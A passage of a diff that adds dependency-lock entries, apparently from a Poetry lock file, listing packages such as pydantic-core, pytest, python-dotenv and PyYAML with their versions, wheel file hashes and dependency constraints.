+ {file = "pydantic_core-2.27.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8c19d1ea0673cd13cc2f872f6c9ab42acc4e4f492a7ca9d3795ce2b112dd7e15"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:5e68c4446fe0810e959cdff46ab0a41ce2f2c86d227d96dc3847af0ba7def306"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d9640b0059ff4f14d1f37321b94061c6db164fbe49b334b31643e0528d100d99"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:40d02e7d45c9f8af700f3452f329ead92da4c5f4317ca9b896de7ce7199ea459"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1c1fd185014191700554795c99b347d64f2bb637966c4cfc16998a0ca700d048"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d81d2068e1c1228a565af076598f9e7451712700b673de8f502f0334f281387d"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:1a4207639fb02ec2dbb76227d7c751a20b1a6b4bc52850568e52260cae64ca3b"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-musllinux_1_1_armv7l.whl", hash = "sha256:3de3ce3c9ddc8bbd88f6e0e304dea0e66d843ec9de1b0042b0911c1663ffd474"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:30c5f68ded0c36466acede341551106821043e9afaad516adfb6e8fa80a4e6a6"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-win32.whl", hash = "sha256:c70c26d2c99f78b125a3459f8afe1aed4d9687c24fd677c6a4436bc042e50d6c"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-win_amd64.whl", hash = "sha256:08e125dbdc505fa69ca7d9c499639ab6407cfa909214d500897d02afb816e7cc"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-win_arm64.whl", hash = "sha256:26f0d68d4b235a2bae0c3fc585c585b4ecc51382db0e3ba402a22cbc440915e4"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-macosx_10_12_x86_64.whl", hash = "sha256:9e0c8cfefa0ef83b4da9588448b6d8d2a2bf1a53c3f1ae5fca39eb3061e2f0b0"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:83097677b8e3bd7eaa6775720ec8e0405f1575015a463285a92bfdfe254529ef"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:172fce187655fece0c90d90a678424b013f8fbb0ca8b036ac266749c09438cb7"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:519f29f5213271eeeeb3093f662ba2fd512b91c5f188f3bb7b27bc5973816934"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:05e3a55d124407fffba0dd6b0c0cd056d10e983ceb4e5dbd10dda135c31071d6"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9c3ed807c7b91de05e63930188f19e921d1fe90de6b4f5cd43ee7fcc3525cb8c"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6fb4aadc0b9a0c063206846d603b92030eb6f03069151a625667f982887153e2"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:28ccb213807e037460326424ceb8b5245acb88f32f3d2777427476e1b32c48c4"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:de3cd1899e2c279b140adde9357c4495ed9d47131b4a4eaff9052f23398076b3"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-musllinux_1_1_armv7l.whl", hash = "sha256:220f892729375e2d736b97d0e51466252ad84c51857d4d15f5e9692f9ef12be4"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:a0fcd29cd6b4e74fe8ddd2c90330fd8edf2e30cb52acda47f06dd615ae72da57"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-win32.whl", hash = "sha256:1e2cb691ed9834cd6a8be61228471d0a503731abfb42f82458ff27be7b2186fc"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-win_amd64.whl", hash = "sha256:cc3f1a99a4f4f9dd1de4fe0312c114e740b5ddead65bb4102884b384c15d8bc9"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-win_arm64.whl", hash = "sha256:3911ac9284cd8a1792d3cb26a2da18f3ca26c6908cc434a18f730dc0db7bfa3b"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-macosx_10_12_x86_64.whl", hash = "sha256:7d14bd329640e63852364c306f4d23eb744e0f8193148d4044dd3dacdaacbd8b"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:82f91663004eb8ed30ff478d77c4d1179b3563df6cdb15c0817cd1cdaf34d154"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:71b24c7d61131bb83df10cc7e687433609963a944ccf45190cfc21e0887b08c9"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:fa8e459d4954f608fa26116118bb67f56b93b209c39b008277ace29937453dc9"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ce8918cbebc8da707ba805b7fd0b382816858728ae7fe19a942080c24e5b7cd1"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:eda3f5c2a021bbc5d976107bb302e0131351c2ba54343f8a496dc8783d3d3a6a"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bd8086fa684c4775c27f03f062cbb9eaa6e17f064307e86b21b9e0abc9c0f02e"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:8d9b3388db186ba0c099a6d20f0604a44eabdeef1777ddd94786cdae158729e4"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-musllinux_1_1_aarch64.whl", hash = "sha256:7a66efda2387de898c8f38c0cf7f14fca0b51a8ef0b24bfea5849f1b3c95af27"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-musllinux_1_1_armv7l.whl", hash = "sha256:18a101c168e4e092ab40dbc2503bdc0f62010e95d292b27827871dc85450d7ee"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-musllinux_1_1_x86_64.whl", hash = "sha256:ba5dd002f88b78a4215ed2f8ddbdf85e8513382820ba15ad5ad8955ce0ca19a1"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-win32.whl", hash = "sha256:1ebaf1d0481914d004a573394f4be3a7616334be70261007e47c2a6fe7e50130"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-win_amd64.whl", hash = "sha256:953101387ecf2f5652883208769a79e48db18c6df442568a0b5ccd8c2723abee"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-win_arm64.whl", hash = "sha256:ac4dbfd1691affb8f48c2c13241a2e3b60ff23247cbcf981759c768b6633cf8b"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-macosx_10_12_x86_64.whl", hash = "sha256:d3e8d504bdd3f10835468f29008d72fc8359d95c9c415ce6e767203db6127506"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:521eb9b7f036c9b6187f0b47318ab0d7ca14bd87f776240b90b21c1f4f149320"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:85210c4d99a0114f5a9481b44560d7d1e35e32cc5634c656bc48e590b669b145"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:d716e2e30c6f140d7560ef1538953a5cd1a87264c737643d481f2779fc247fe1"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f66d89ba397d92f840f8654756196d93804278457b5fbede59598a1f9f90b228"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:669e193c1c576a58f132e3158f9dfa9662969edb1a250c54d8fa52590045f046"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9fdbe7629b996647b99c01b37f11170a57ae675375b14b8c13b8518b8320ced5"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d262606bf386a5ba0b0af3b97f37c83d7011439e3dc1a9298f21efb292e42f1a"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:cabb9bcb7e0d97f74df8646f34fc76fbf793b7f6dc2438517d7a9e50eee4f14d"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-musllinux_1_1_armv7l.whl", hash = "sha256:d2d63f1215638d28221f664596b1ccb3944f6e25dd18cd3b86b0a4c408d5ebb9"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:bca101c00bff0adb45a833f8451b9105d9df18accb8743b08107d7ada14bd7da"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-win32.whl", hash = "sha256:f6f8e111843bbb0dee4cb6594cdc73e79b3329b526037ec242a3e49012495b3b"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-win_amd64.whl", hash = "sha256:fd1aea04935a508f62e0d0ef1f5ae968774a32afc306fb8545e06f5ff5cdf3ad"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-macosx_10_12_x86_64.whl", hash = "sha256:c10eb4f1659290b523af58fa7cffb452a61ad6ae5613404519aee4bfbf1df993"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ef592d4bad47296fb11f96cd7dc898b92e795032b4894dfb4076cfccd43a9308"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c61709a844acc6bf0b7dce7daae75195a10aac96a596ea1b776996414791ede4"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:42c5f762659e47fdb7b16956c71598292f60a03aa92f8b6351504359dbdba6cf"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4c9775e339e42e79ec99c441d9730fccf07414af63eac2f0e48e08fd38a64d76"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:57762139821c31847cfb2df63c12f725788bd9f04bc2fb392790959b8f70f118"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0d1e85068e818c73e048fe28cfc769040bb1f475524f4745a5dc621f75ac7630"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:097830ed52fd9e427942ff3b9bc17fab52913b2f50f2880dc4a5611446606a54"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:044a50963a614ecfae59bb1eaf7ea7efc4bc62f49ed594e18fa1e5d953c40e9f"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-musllinux_1_1_armv7l.whl", hash = "sha256:4e0b4220ba5b40d727c7f879eac379b822eee5d8fff418e9d3381ee45b3b0362"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:5e4f4bb20d75e9325cc9696c6802657b58bc1dbbe3022f32cc2b2b632c3fbb96"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-win32.whl", hash = "sha256:cca63613e90d001b9f2f9a9ceb276c308bfa2a43fafb75c8031c4f66039e8c6e"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-win_amd64.whl", hash = "sha256:77d1bca19b0f7021b3a982e6f903dcd5b2b06076def36a652e3907f596e29f67"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-macosx_10_12_x86_64.whl", hash = "sha256:2bf14caea37e91198329b828eae1618c068dfb8ef17bb33287a7ad4b61ac314e"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:b0cb791f5b45307caae8810c2023a184c74605ec3bcbb67d13846c28ff731ff8"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:688d3fd9fcb71f41c4c015c023d12a79d1c4c0732ec9eb35d96e3388a120dcf3"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3d591580c34f4d731592f0e9fe40f9cc1b430d297eecc70b962e93c5c668f15f"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:82f986faf4e644ffc189a7f1aafc86e46ef70372bb153e7001e8afccc6e54133"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:bec317a27290e2537f922639cafd54990551725fc844249e64c523301d0822fc"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-musllinux_1_1_armv7l.whl", hash = "sha256:0296abcb83a797db256b773f45773da397da75a08f5fcaef41f2044adec05f50"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:0d75070718e369e452075a6017fbf187f788e17ed67a3abd47fa934d001863d9"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:7e17b560be3c98a8e3aa66ce828bdebb9e9ac6ad5466fba92eb74c4c95cb1151"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-macosx_10_12_x86_64.whl", hash = "sha256:c33939a82924da9ed65dab5a65d427205a73181d8098e79b6b426bdf8ad4e656"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:00bad2484fa6bda1e216e7345a798bd37c68fb2d97558edd584942aa41b7d278"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c817e2b40aba42bac6f457498dacabc568c3b7a986fc9ba7c8d9d260b71485fb"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:251136cdad0cb722e93732cb45ca5299fb56e1344a833640bf93b2803f8d1bfd"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d2088237af596f0a524d3afc39ab3b036e8adb054ee57cbb1dcf8e09da5b29cc"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:d4041c0b966a84b4ae7a09832eb691a35aec90910cd2dbe7a208de59be77965b"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-musllinux_1_1_armv7l.whl", hash = "sha256:8083d4e875ebe0b864ffef72a4304827015cff328a1be6e22cc850753bfb122b"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:f141ee28a0ad2123b6611b6ceff018039df17f32ada8b534e6aa039545a3efb2"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:7d0c8399fcc1848491f00e0314bd59fb34a9c008761bcb422a057670c3f65e35"},
+ {file = "pydantic_core-2.27.2.tar.gz", hash = "sha256:eb026e5a4c1fee05726072337ff51d1efb6f59090b7da90d30ea58625b1ffb39"},
+]
+
+[package.dependencies]
+typing-extensions = ">=4.6.0,<4.7.0 || >4.7.0"
+
+[[package]]
+name = "pymdown-extensions"
+version = "10.13"
+description = "Extension pack for Python Markdown."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pymdown_extensions-10.13-py3-none-any.whl", hash = "sha256:80bc33d715eec68e683e04298946d47d78c7739e79d808203df278ee8ef89428"},
+ {file = "pymdown_extensions-10.13.tar.gz", hash = "sha256:e0b351494dc0d8d14a1f52b39b1499a00ef1566b4ba23dc74f1eba75c736f5dd"},
+]
+
+[package.dependencies]
+markdown = ">=3.6"
+pyyaml = "*"
+
+[package.extras]
+extra = ["pygments (>=2.12)"]
+
+[[package]]
+name = "pyparsing"
+version = "3.1.4"
+description = "pyparsing module - Classes and methods to define and execute parsing grammars"
+optional = false
+python-versions = ">=3.6.8"
+files = [
+ {file = "pyparsing-3.1.4-py3-none-any.whl", hash = "sha256:a6a7ee4235a3f944aa1fa2249307708f893fe5717dc603503c6c7969c070fb7c"},
+ {file = "pyparsing-3.1.4.tar.gz", hash = "sha256:f86ec8d1a83f11977c9a6ea7598e8c27fc5cddfa5b07ea2241edbbde1d7bc032"},
+]
+
+[package.extras]
+diagrams = ["jinja2", "railroad-diagrams"]
+
+[[package]]
+name = "pytest"
+version = "7.4.4"
+description = "pytest: simple powerful testing with Python"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "pytest-7.4.4-py3-none-any.whl", hash = "sha256:b090cdf5ed60bf4c45261be03239c2c1c22df034fbffe691abe93cd80cea01d8"},
+ {file = "pytest-7.4.4.tar.gz", hash = "sha256:2cf0005922c6ace4a3e2ec8b4080eb0d9753fdc93107415332f50ce9e7994280"},
+]
+
+[package.dependencies]
+colorama = {version = "*", markers = "sys_platform == \"win32\""}
+exceptiongroup = {version = ">=1.0.0rc8", markers = "python_version < \"3.11\""}
+iniconfig = "*"
+packaging = "*"
+pluggy = ">=0.12,<2.0"
+tomli = {version = ">=1.0.0", markers = "python_version < \"3.11\""}
+
+[package.extras]
+testing = ["argcomplete", "attrs (>=19.2.0)", "hypothesis (>=3.56)", "mock", "nose", "pygments (>=2.7.2)", "requests", "setuptools", "xmlschema"]
+
+[[package]]
+name = "pytest-env"
+version = "0.8.2"
+description = "py.test plugin that allows you to add environment variables."
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "pytest_env-0.8.2-py3-none-any.whl", hash = "sha256:5e533273f4d9e6a41c3a3120e0c7944aae5674fa773b329f00a5eb1f23c53a38"},
+ {file = "pytest_env-0.8.2.tar.gz", hash = "sha256:baed9b3b6bae77bd75b9238e0ed1ee6903a42806ae9d6aeffb8754cd5584d4ff"},
+]
+
+[package.dependencies]
+pytest = ">=7.3.1"
+
+[package.extras]
+test = ["coverage (>=7.2.7)", "pytest-mock (>=3.10)"]
+
+[[package]]
+name = "pytest-mock"
+version = "3.14.0"
+description = "Thin-wrapper around the mock package for easier use with pytest"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pytest-mock-3.14.0.tar.gz", hash = "sha256:2719255a1efeceadbc056d6bf3df3d1c5015530fb40cf347c0f9afac88410bd0"},
+ {file = "pytest_mock-3.14.0-py3-none-any.whl", hash = "sha256:0b72c38033392a5f4621342fe11e9219ac11ec9d375f8e2a0c164539e0d70f6f"},
+]
+
+[package.dependencies]
+pytest = ">=6.2.5"
+
+[package.extras]
+dev = ["pre-commit", "pytest-asyncio", "tox"]
+
+[[package]]
+name = "python-dateutil"
+version = "2.9.0.post0"
+description = "Extensions to the standard Python datetime module"
+optional = false
+python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
+files = [
+ {file = "python-dateutil-2.9.0.post0.tar.gz", hash = "sha256:37dd54208da7e1cd875388217d5e00ebd4179249f90fb72437e91a35459a0ad3"},
+ {file = "python_dateutil-2.9.0.post0-py2.py3-none-any.whl", hash = "sha256:a8b2bc7bffae282281c8140a97d3aa9c14da0b136dfe83f850eea9a5f7470427"},
+]
+
+[package.dependencies]
+six = ">=1.5"
+
+[[package]]
+name = "python-dotenv"
+version = "1.0.1"
+description = "Read key-value pairs from a .env file and set them as environment variables"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "python-dotenv-1.0.1.tar.gz", hash = "sha256:e324ee90a023d808f1959c46bcbc04446a10ced277783dc6ee09987c37ec10ca"},
+ {file = "python_dotenv-1.0.1-py3-none-any.whl", hash = "sha256:f7b63ef50f1b690dddf550d03497b66d609393b40b564ed0d674909a68ebf16a"},
+]
+
+[package.extras]
+cli = ["click (>=5.0)"]
+
+[[package]]
+name = "pytz"
+version = "2024.2"
+description = "World timezone definitions, modern and historical"
+optional = false
+python-versions = "*"
+files = [
+ {file = "pytz-2024.2-py2.py3-none-any.whl", hash = "sha256:31c7c1817eb7fae7ca4b8c7ee50c72f93aa2dd863de768e1ef4245d426aa0725"},
+ {file = "pytz-2024.2.tar.gz", hash = "sha256:2aa355083c50a0f93fa581709deac0c9ad65cca8a9e9beac660adcbd493c798a"},
+]
+
+[[package]]
+name = "pyyaml"
+version = "6.0.2"
+description = "YAML parser and emitter for Python"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "PyYAML-6.0.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:0a9a2848a5b7feac301353437eb7d5957887edbf81d56e903999a75a3d743086"},
+ {file = "PyYAML-6.0.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:29717114e51c84ddfba879543fb232a6ed60086602313ca38cce623c1d62cfbf"},
+ {file = "PyYAML-6.0.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8824b5a04a04a047e72eea5cec3bc266db09e35de6bdfe34c9436ac5ee27d237"},
+ {file = "PyYAML-6.0.2-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:7c36280e6fb8385e520936c3cb3b8042851904eba0e58d277dca80a5cfed590b"},
+ {file = "PyYAML-6.0.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ec031d5d2feb36d1d1a24380e4db6d43695f3748343d99434e6f5f9156aaa2ed"},
+ {file = "PyYAML-6.0.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:936d68689298c36b53b29f23c6dbb74de12b4ac12ca6cfe0e047bedceea56180"},
+ {file = "PyYAML-6.0.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:23502f431948090f597378482b4812b0caae32c22213aecf3b55325e049a6c68"},
+ {file = "PyYAML-6.0.2-cp310-cp310-win32.whl", hash = "sha256:2e99c6826ffa974fe6e27cdb5ed0021786b03fc98e5ee3c5bfe1fd5015f42b99"},
+ {file = "PyYAML-6.0.2-cp310-cp310-win_amd64.whl", hash = "sha256:a4d3091415f010369ae4ed1fc6b79def9416358877534caf6a0fdd2146c87a3e"},
+ {file = "PyYAML-6.0.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:cc1c1159b3d456576af7a3e4d1ba7e6924cb39de8f67111c735f6fc832082774"},
+ {file = "PyYAML-6.0.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:1e2120ef853f59c7419231f3bf4e7021f1b936f6ebd222406c3b60212205d2ee"},
+ {file = "PyYAML-6.0.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5d225db5a45f21e78dd9358e58a98702a0302f2659a3c6cd320564b75b86f47c"},
+ {file = "PyYAML-6.0.2-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5ac9328ec4831237bec75defaf839f7d4564be1e6b25ac710bd1a96321cc8317"},
+ {file = "PyYAML-6.0.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3ad2a3decf9aaba3d29c8f537ac4b243e36bef957511b4766cb0057d32b0be85"},
+ {file = "PyYAML-6.0.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:ff3824dc5261f50c9b0dfb3be22b4567a6f938ccce4587b38952d85fd9e9afe4"},
+ {file = "PyYAML-6.0.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:797b4f722ffa07cc8d62053e4cff1486fa6dc094105d13fea7b1de7d8bf71c9e"},
+ {file = "PyYAML-6.0.2-cp311-cp311-win32.whl", hash = "sha256:11d8f3dd2b9c1207dcaf2ee0bbbfd5991f571186ec9cc78427ba5bd32afae4b5"},
+ {file = "PyYAML-6.0.2-cp311-cp311-win_amd64.whl", hash = "sha256:e10ce637b18caea04431ce14fabcf5c64a1c61ec9c56b071a4b7ca131ca52d44"},
+ {file = "PyYAML-6.0.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:c70c95198c015b85feafc136515252a261a84561b7b1d51e3384e0655ddf25ab"},
+ {file = "PyYAML-6.0.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:ce826d6ef20b1bc864f0a68340c8b3287705cae2f8b4b1d932177dcc76721725"},
+ {file = "PyYAML-6.0.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1f71ea527786de97d1a0cc0eacd1defc0985dcf6b3f17bb77dcfc8c34bec4dc5"},
+ {file = "PyYAML-6.0.2-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9b22676e8097e9e22e36d6b7bda33190d0d400f345f23d4065d48f4ca7ae0425"},
+ {file = "PyYAML-6.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:80bab7bfc629882493af4aa31a4cfa43a4c57c83813253626916b8c7ada83476"},
+ {file = "PyYAML-6.0.2-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:0833f8694549e586547b576dcfaba4a6b55b9e96098b36cdc7ebefe667dfed48"},
+ {file = "PyYAML-6.0.2-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:8b9c7197f7cb2738065c481a0461e50ad02f18c78cd75775628afb4d7137fb3b"},
+ {file = "PyYAML-6.0.2-cp312-cp312-win32.whl", hash = "sha256:ef6107725bd54b262d6dedcc2af448a266975032bc85ef0172c5f059da6325b4"},
+ {file = "PyYAML-6.0.2-cp312-cp312-win_amd64.whl", hash = "sha256:7e7401d0de89a9a855c839bc697c079a4af81cf878373abd7dc625847d25cbd8"},
+ {file = "PyYAML-6.0.2-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:efdca5630322a10774e8e98e1af481aad470dd62c3170801852d752aa7a783ba"},
+ {file = "PyYAML-6.0.2-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:50187695423ffe49e2deacb8cd10510bc361faac997de9efef88badc3bb9e2d1"},
+ {file = "PyYAML-6.0.2-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0ffe8360bab4910ef1b9e87fb812d8bc0a308b0d0eef8c8f44e0254ab3b07133"},
+ {file = "PyYAML-6.0.2-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:17e311b6c678207928d649faa7cb0d7b4c26a0ba73d41e99c4fff6b6c3276484"},
+ {file = "PyYAML-6.0.2-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:70b189594dbe54f75ab3a1acec5f1e3faa7e8cf2f1e08d9b561cb41b845f69d5"},
+ {file = "PyYAML-6.0.2-cp313-cp313-musllinux_1_1_aarch64.whl", hash = "sha256:41e4e3953a79407c794916fa277a82531dd93aad34e29c2a514c2c0c5fe971cc"},
+ {file = "PyYAML-6.0.2-cp313-cp313-musllinux_1_1_x86_64.whl", hash = "sha256:68ccc6023a3400877818152ad9a1033e3db8625d899c72eacb5a668902e4d652"},
+ {file = "PyYAML-6.0.2-cp313-cp313-win32.whl", hash = "sha256:bc2fa7c6b47d6bc618dd7fb02ef6fdedb1090ec036abab80d4681424b84c1183"},
+ {file = "PyYAML-6.0.2-cp313-cp313-win_amd64.whl", hash = "sha256:8388ee1976c416731879ac16da0aff3f63b286ffdd57cdeb95f3f2e085687563"},
+ {file = "PyYAML-6.0.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:24471b829b3bf607e04e88d79542a9d48bb037c2267d7927a874e6c205ca7e9a"},
+ {file = "PyYAML-6.0.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d7fded462629cfa4b685c5416b949ebad6cec74af5e2d42905d41e257e0869f5"},
+ {file = "PyYAML-6.0.2-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d84a1718ee396f54f3a086ea0a66d8e552b2ab2017ef8b420e92edbc841c352d"},
